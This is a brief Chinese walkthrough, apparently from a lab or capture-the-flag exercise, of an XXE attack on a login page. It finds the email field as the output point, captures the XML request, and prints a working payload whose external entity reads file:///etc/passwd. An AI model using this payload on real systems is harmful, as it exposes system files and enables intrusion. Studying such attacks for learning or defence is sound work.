进到登录界面,已经知道是用XXE过,那么首先我们需要找到当前页面的输出点,以便于之后输出我们需要的信息。
这里可以看到输出点在邮箱这里,那么抓个包查看一下,看到抓到的请求包中有一串XML
在这里就可以构造我们的攻击语句了,正常构造的是这样的一串代码格式。
但我们需要根据当前页面的格式来构造具体的攻击语句
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY asd SYSTEM "file:///etc/passwd">]>
<root>&asd;</root>
这样就成功输出了我们需要的信息